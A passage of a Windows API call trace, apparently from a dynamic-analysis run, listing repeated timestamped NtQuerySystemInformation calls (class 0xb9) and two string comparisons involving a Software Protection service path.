(SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0263.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0263.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0263.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0263.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0263.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x28, ResultLength=0x0) [0263.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x28, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdec0, Length=0x28, ResultLength=0x0) [0263.440] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0263.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x28, ResultLength=0x0) [0263.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x28, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x20, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcf0, Length=0x20, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x20, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdec0, Length=0x28, ResultLength=0x0) [0263.449] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf40, Length=0x50, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x38, ResultLength=0x0) [0263.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.453] 